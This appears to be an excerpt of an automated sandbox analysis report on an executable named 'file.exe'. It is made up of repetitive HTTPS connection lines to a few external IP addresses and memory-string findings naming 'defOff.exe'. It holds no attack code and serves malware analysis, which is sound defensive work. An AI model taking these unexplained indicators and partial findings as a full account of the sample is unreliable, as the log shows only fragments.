              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.5:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49854 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeBinary or memory string: OriginalFilename vs file.exe
              Source: file.exe, 00000000.00000003.2374099297.0000000005A66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2372228089.000000000592D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2359526648.0000000005925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2357548937.00000000059E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361696253.0000000005922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2369387450.0000000005A48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2360805489.000000000592E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2492403786.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOz vs file.exe
              Source: file.exe, 00000000.00000003.2349193994.0000000005722000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2364143833.0000000005930000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2362307455.0000000005926000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2368314921.0000000005923000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2357031245.000000000592C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2366134599.0000000005922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2349715068.0000000005587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2365166895.0000000005A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2364712422.0000000005B50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2366353592.0000000005A42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2363188682.000000000592B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2363847370.0000000005A30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2370194629.0000000005B7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2359998454.00000000059F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2364253638.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2390336081.0000000000D5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOz vs file.exe
              Source: file.exe, 00000000.00000003.2350282763.000000000592E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2390193439.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2351649042.0000000005927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2350403780.0000000005583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2351334166.00000000059C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2363985442.0000000005B3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2360346392.0000000005922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2349389327.000000000558D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2366791525.0000000005924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2374282225.0000000005BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2360187839.0000000005ACC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2350896908.0000000005925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2373621455.0000000005928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2358902339.000000000592A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2351912712.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2364971253.0000000005923000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2362921768.0000000005A29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2351513004.0000000005A6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2358716063.00000000059FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2351725416.00000000059E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361499376.0000000005A08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2359729561.0000000005A01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2364561815.0000000005A39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2363545620.0000000005B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2372728461.000000000592D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2374734644.0000000005923000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361392683.0000000005922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2363059984.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2364399670.0000000005922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2362169444.0000000005B10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2371971397.0000000005B8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2365779590.0000000005A48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361805144.0000000005A16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361063251.0000000005B00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2353375028.00000000059D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2359866475.0000000005927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2367307604.0000000005A44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2357415149.000000000592C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2350542940.0000000005926000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
